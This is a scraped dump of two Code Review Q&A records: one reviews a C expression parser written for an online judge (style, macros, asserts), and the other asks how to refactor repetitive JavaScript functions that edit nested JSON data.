'(': ++*in; root = parse(mem, in, root, CONTEXT_FIRST_TERM); TEST_ASSERT_MSG(**in == ')', %c, **in); ++*in; break; default: TEST_ASSERT_MSG( **in != ')' && **in != '+' && **in != '-' && **in != '*' && **in != '/' && **in != '\n' , %c, **in ); root->type = readChar(in); break; } } for (;;) { // Operator if (!skipStart) { switch (**in) { case '\n': case ')': TEST_ASSERT(root != NULL); TEST_ASSERT(root->type != '.'); return root; case '+': case '-': if (context == CONTEXT_NONFIRST_TERM) { TEST_ASSERT(root != NULL); TEST_ASSERT(root->type != '.'); return root; } TEST_ASSERT( (context == CONTEXT_ADDITIVE_EXPRESSION) == (root->type == '+' || root->type == '-') ); context = CONTEXT_ADDITIVE_EXPRESSION; root = moveToChild(mem, root, 0, readChar(in)); break; case '*': case '/': if (context == CONTEXT_ADDITIVE_EXPRESSION) { TEST_ASSERT(root->child[1]->type != '.'); root->child[1] = moveToChild(mem, root->child[1], 0, readChar(in)); root->child[1] = parse(mem, in, root->child[1], CONTEXT_NONFIRST_TERM); continue; // Parsed up to next operator or teminator } root = moveToChild(mem, root, 0, readChar(in)); break; default: TEST_ASSERT(false); break; } } skipStart = false; // Right operand switch (**in) { case '(': ++*in; root->child[1] = parse(mem, in, createNode(mem, '.'), CONTEXT_FIRST_TERM); TEST_ASSERT_MSG(**in == ')', %c, **in); ++*in; break; default: TEST_ASSERT_MSG( **in != ')' && **in != '+' && **in != '-' && **in != '*' && **in != '/' && **in != '\n' , %c, **in ); root->child[1] = createNode(mem, readChar(in)); break; } }}void serialiseTree(const struct ExprNode * restrict node, char * restrict * restrict out, char parentType, bool isLeftChild){ IF_TESTING( if (!node) { writeChar(out, 'N'); return; } ) TEST_ASSERT( parentType == '+' || parentType == '-' || parentType == '*' || parentType == '/' ); bool paren = false; switch (node->type) { case '+': case '-': paren = ( parentType == '*' || parentType == '/' || (parentType == '-' && !isLeftChild) ); break; case '*': case '/': paren = (parentType == '/' && !isLeftChild); break; default: writeChar(out, node->type); return; } if (paren) { writeChar(out, '('); } serialiseTree(node->child[0], out, node->type, true); writeChar(out, node->type); serialiseTree(node->child[1], out, node->type, false); if (paren) { writeChar(out, ')'); }}void createTree(struct NodeMemory *mem){ char expr[MAX_INPUT_SIZE + 2]; fgets(expr, sizeof(expr), stdin); const char *in = expr; if (*in == '\n') { fputs(expr, stdout); return; } struct ExprNode *root = parse(mem, &in, createNode(mem, '.'), CONTEXT_FIRST_TERM); TEST_ASSERT(*in == '\n'); TEST_ASSERT(root != NULL); char *out = expr; serialiseTree(root, &out, '+', true); *out++ = '\n'; *out = 0; TEST_ASSERT(out - expr < sizeof(expr)); fputs(expr, stdout);}void runCase(void){ struct NodeMemory mem; mem.end = mem.data; createTree(&mem);}int main(void) { int caseCount; fscanf(stdin, %d\n, &caseCount); for (int idxCase = 0; idxCase < caseCount; ++idxCase) { runCase(); } return 0;}Notes:I use ideone for developing this code, so that's why I'm using my own assertions instead of built-in assert(); an unusual termination wouldn't be too helpful.There's no error checking on input because in the context of the online judge, input correctness is guaranteed.NodeMemory is used to avoid overhead of dynamic allocation in presence of a known maximum problem size. | Parsing expressions using idiomatic C | c;parsing | These comments are not really related to writing idiomatic C, merely things I noticed in your code.Your handling of commas in lists is odd:enum ParsingContext { CONTEXT_FIRST_TERM , CONTEXT_ADDITIVE_EXPRESSION , CONTEXT_NONFIRST_TERM};struct ExprNode* moveToChild( struct NodeMemory * restrict mem , struct ExprNode * restrict node , size_t idxChild , char newParentType )I have never seen things written like that and don't see any advantageover the normal use:enum ParsingContext { CONTEXT_FIRST_TERM, CONTEXT_ADDITIVE_EXPRESSION, CONTEXT_NONFIRST_TERM};struct ExprNode* moveToChild(struct NodeMemory * restrict mem, struct ExprNode * restrict node, size_t idxChild, char newParentType)Your macros and their invocation should allow a semicolon to be placed whereexpected. Otherwise, syntax-aware editors can get confused and mess up theindentation: IF_TESTING( node->child[0] = node->child[1] = NULL; ) return node;Better to move the ; out of the bracket: IF_TESTING((node->child[0] = node->child[1] = NULL)); return node;Your asserts that check against a list of chars could be simpler withstrchr (also I find the placement of the && here to be distracting, but Iknow some people like it that way):TEST_ASSERT_MSG( **in != ')' && **in != '+' && **in != '-' && **in != '*' && **in != '/' && **in != '\n' , %c, **in );Neater (?):TEST_ASSERT_MSG(!strchr()+-*/\n, **in), %c, **in);I always find passing double pointers to be awkward and confusing, so Iavoid it if possible. In this case it seems that you could read and writethe input/output string directly to/from stdin/out as you go, replacereadChar and writeChar with fgetc and fputc and passstdin/stdout around in instead of in and out (or just use thestdin/stdout globals).Note that using an assert to check for exceeding the available memory isincorrect. This should be an explicit if and exit.TEST_ASSERT(mem->end - mem->data <= MAX_NODE_COUNT); |
_codereview.70936 | I am making an application in which the user has the ability to add, remove, and edit JSON data through DOM interaction. I have created a working JavaScript-only prototype that accepts certain variables to manipulate certain elements of the JSON data, although it is rather messy and seems rather impossible for me to implement with the DOM.Right now, my current structure is:Example Modding Session Modding Section A modA modAnother Modding Section A modA modA modAnother Modding Session Modding Section Another modAnother modAnother modModding Section Another modWhich has worked fine for me, however, my functions are very repetitive, which I would like to fix.var addSession = function(sessionName) { var selfSessionName = sessionName || undefined; if(!selfSessionName) return; moddingSessions.push({ name: selfSessionName, sections: [] });}Here you may start to see a pattern:var addSection = function(sectionName, sessionName) { var selfSessionName = sessionName || undefined, selfSectionName = sectionName || undefined; if(!selfSectionName || !selfSectionName) return; for(var i = 0; i < moddingSessions.length; i++) { if(moddingSessions[i].name === selfSessionName) { moddingSessions[i].sections.push({ name: selfSectionName, mods: [] }); } }}And here:var addMod = function(modContent, sectionName, sessionName) { var selfSessionName = sessionName || undefined, selfSectionName = sectionName || undefined, selfModContent = modContent || undefined; if(!selfModContent || !selfSectionName || !selfSectionName) return; for(var i = 0; i < moddingSessions.length; i++) { if(moddingSessions[i].name === selfSessionName) { for(var j = 0; j < moddingSessions[i].sections.length; j++) { if(moddingSessions[i].sections[j].name === selfSectionName) { moddingSessions[i].sections[j].mods.push(modContent); } } } }}As you can see, it works, but isn't very effective. I also have no idea how to handle each and every parameter when using this with DOM interaction. I hope there is a better way to achieve the same functionality. | Manipulate JSON data from the client with JavaScript | javascript;json | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.